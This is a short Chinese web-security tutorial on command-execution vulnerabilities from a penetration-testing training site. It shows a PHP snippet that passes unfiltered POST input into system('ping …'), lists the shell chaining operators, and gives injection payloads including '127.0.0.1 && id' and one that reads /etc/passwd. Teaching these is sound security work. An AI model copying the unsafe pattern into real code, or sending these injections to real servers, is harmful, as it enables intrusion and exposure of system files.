[原创]WEB安全第五章 漏洞学习与利用08命令执行漏洞与利用
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第五章 漏洞学习与利用08命令执行漏洞与利用
在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。
[php]
<?php
if($_POST[‘ip’]){
echo system(‘ping ‘.$_POST[‘ip’]);
}
?>
[/php]
命令连接符号总结
command1 && command2 先执行command1后执行command2
127.0.0.1 && id
command1 | command2 只执行command2
command1 & command2
先执行command1后执行command2
127.0.0.1 -c 3 & cat /etc/passwd
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/290.html